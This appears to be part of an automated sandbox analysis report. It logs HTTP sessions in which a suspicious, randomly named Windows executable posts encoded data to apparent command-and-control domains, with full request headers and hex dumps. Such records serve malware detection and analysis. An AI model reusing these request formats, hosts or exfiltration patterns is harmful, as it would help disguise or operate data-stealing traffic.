                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 35 44 6e 52 48 74 51 46 56 64 65 2f 72 46 4c 53 55 7a 4c 73 62 4a 33 46 6a 38 52 79 74 47 49 54 56 38 38 54 31 46 41 4c 55 61 65 4d 6d 6e 4b 51 61 63 4d 75 5a 51 50 52 4e 77 59 54 4c 69 42 77 4e 36 76 46 66 39 61 46 41 66 49 2b 34 4e 2f 35 66 51 68 37 34 41 54 45 35 49 36 70 6e 55 68 75 4c 53 30 6c 69 2b 73 59 7a 74 54 39 41 49 43 76 37 39 77 43 66 34 52 47 49 4c 42 75 54 48 6f 32 41 33 66 55 54 45 76 68 63 45 77 63 4f 31 2f 68 64 74 52 57 47 46 59 69 41 71 30 30 2b 4e 61 73 38 66 6c 6d 2b 53 61 73 78 54 46 57 4d 54 44 6f 54 7a
                                                                                  Data Ascii: lH_L4=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcO1/hdtRWGFYiAq00+Nas8flm+SasxTFWMTDoTz
                                                                                  Nov 27, 2024 01:25:57.706832886 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:57 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: 13efd7e8-3c5f-4b66-96df-16ed38e87b5f
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=13efd7e8-3c5f-4b66-96df-16ed38e87b5f; expires=Wed, 27 Nov 2024 00:40:57 GMT; path=/
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:25:57.706887007 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTNlZmQ3ZTgtM2M1Zi00YjY2LTk2ZGYtMTZlZDM4ZTg3YjVmIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549815199.59.243.227803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:59.233505011 CET1661OUTPOST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 31 67 33 53 46 2b 75 30 43 5a 61 74 76 57 44 74 41 38 55 50 47 61 6c 52 51 77 47 35 44 4b 75 58 63 34 4b 7a 6a 36 6d 62 34 34 4c 63 6e 30 49 4b 34 36 4a 42 6d 57 70 51 6e 43 64 7a 4a 4d 42 71 4e 63 34 52 64 41 39 63 71 53 72 56 6f 6a 65 79 44 67 4b 61 62 56 78 6d 42 51 54 65 39 6e 7a 72 6c 53 45 38 4b 67 62 6e 63 30 4f 41 7a 43 51 4b 36 6f 6b 39 79 75 46 39 47 4c 67 46 45 71 6d 65 44 2f 58 4a 54 64 59 66 33 62 55 5a 43 51 50 76 71 39 5a 71 51 69 37 79 7a 6d 73 6a 56 77 37 6d 7a 75 52 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o1g3SF+u0CZatvWDtA8UPGalRQwG5DKuXc4Kzj6mb44Lcn0IK46JBmWpQnCdzJMBqNc4RdA9cqSrVojeyDgKabVxmBQTe9nzrlSE8Kgbnc0OAzCQK6ok9yuF9GLgFEqmeD/XJTdYf3bUZCQPvq9ZqQi7yzmsjVw7mzuRsGu9/RRTSIJPoXRAJcQsFBbmdxolp6kvFEzZEjh3WVyvfHPgdpEQR4eJJbvLuR1nEmYnpKL+7vNejgkuK6P2HkFJirFjpRtft1d5yqHfhsixPZskXlpzoiIjyuOUgJNkWl+si+bluT+QTQlDX2gX4S2wnavBzQa8s8dx07JyiMvRnkgHylOh7h9aR2ZSxTqcLWkKt/E5yiUnqf9U6NjU4mUTlUuxwydJ6A3Bd7PFcb88gfuyPt4jks/tif8Ivr+7a/41UWmpvpjUdK7pU0Ow+pklC3XXhEsxcXgvfYu+El9JfXfj5rE3hRBc0jQlUSsuiKsl3kT2KEUEpsfKSOjHKwRwk271gy+N+F00QGB1Se2mUk/HOqJc3UUUAsMnsEwmdKp/VJr8aNsGxGXW6HKOZD7CXPbu2q54Seb29idKkMq1nl56K+j74QyzGvFNS0myDFM2ZOOgNnAxnKKEf3V3oX1mTj1U3NDmyhEk+t3Jj6l5e0ijT+DCW1PSq6PFDcnl+mCwmLfqgH1phmY7madKYvy5VcCUyUo9zH9yuHWkqIoz1Idc/EVgMR2Rscd8kKp8reBaMX+HUO+53dULV6o17HMS9xqtNo8JmqQ1YNvP/7qED112QDs+Sn5zHrbQKwYcQnBrrFb8pLWwCFu2Sn8Yr85XYHWLdXes0N [TRUNCATED]
                                                                                  Nov 27, 2024 01:26:00.363328934 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:59 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: 23e61a22-0fd6-4ee4-99af-5137eb840a35
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=23e61a22-0fd6-4ee4-99af-5137eb840a35; expires=Wed, 27 Nov 2024 00:41:00 GMT; path=/
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:26:00.363392115 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjNlNjFhMjItMGZkNi00ZWU0LTk5YWYtNTEzN2ViODQwYTM1IiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.549821199.59.243.227803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:01.884886026 CET364OUTGET /w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:26:02.972707987 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:26:02 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1518
                                                                                  x-request-id: 073a4db1-d7d9-4780-997b-1a9e9ff40c0a
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fmHxTbi1rFHGbfjyNMnkulp0sp7KY+xyEGOi0E1vHixD9UpSV/X7x9vp6CvtrmRTyIu/A5Yo64d91hYPGAA9GA==
                                                                                  set-cookie: parking_session=073a4db1-d7d9-4780-997b-1a9e9ff40c0a; expires=Wed, 27 Nov 2024 00:41:02 GMT; path=/
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6d 48 78 54 62 69 31 72 46 48 47 62 66 6a 79 4e 4d 6e 6b 75 6c 70 30 73 70 37 4b 59 2b 78 79 45 47 4f 69 30 45 31 76 48 69 78 44 39 55 70 53 56 2f 58 37 78 39 76 70 36 43 76 74 72 6d 52 54 79 49 75 2f 41 35 59 6f 36 34 64 39 31 68 59 50 47 41 41 39 47 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fmHxTbi1rFHGbfjyNMnkulp0sp7KY+xyEGOi0E1vHixD9UpSV/X7x9vp6CvtrmRTyIu/A5Yo64d91hYPGAA9GA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:26:02.972793102 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDczYTRkYjEtZDdkOS00NzgwLTk5N2ItMWE5ZTlmZjQwYzBhIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.549839146.88.233.115803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:09.389535904 CET621OUTPOST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2f 71 30 59 75 31 47 42 4d 53 6f 6b 75 76 48 47 4b 6d 57 47 47 33 57 41 6b 37 71 2f 59 39 51 43 56 71 46 64 35 55 41 3d
                                                                                  Data Ascii: lH_L4=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/q0Yu1GBMSokuvHGKmWGG3WAk7q/Y9QCVqFd5UA=
                                                                                  Nov 27, 2024 01:26:10.930433035 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:10 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.549845146.88.233.115803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:12.047336102 CET641OUTPOST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 36 34 30 6f 69 49 4a 4e 78 72 50 4a 56 74 6e 44 56 62 42 43 50 79 51 70 65 36 57 34 42 53 4d 61 6c 72 54 74 58 56
                                                                                  Data Ascii: lH_L4=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVX640oiIJNxrPJVtnDVbBCPyQpe6W4BSMalrTtXV
                                                                                  Nov 27, 2024 01:26:13.309948921 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:13 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.549851146.88.233.115803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:14.705929041 CET1658OUTPOST /11t3/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.smartcongress.net/11t3/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 34 46 70 4d 50 6e 4b 56 65 6b 44 42 33 64 36 50 65 75 62 4a 78 46 43 4b 78 65 76 45 73 31 4a 78 48 61 61 70 32 63 43 34 59 41 55 2f 39 72 56 6f 71 63 6e 4d 35 68 38 49 49 42 64 2b 52 2f 74 34 4e 59 67 30 52 45 37 4f 51 66 65 4c 39 57 76 39 4f 61 6a 36 62 41 6b 47 34 56 61 6c 71 30 37 58 33 33 55 6e 38 72 31 6b 72 31 4b 2b 6b 77 67 44 44 59 48 54 44 55 4a 74 6e 6f 41 32 75 42 2f 4c 70 34 78 69 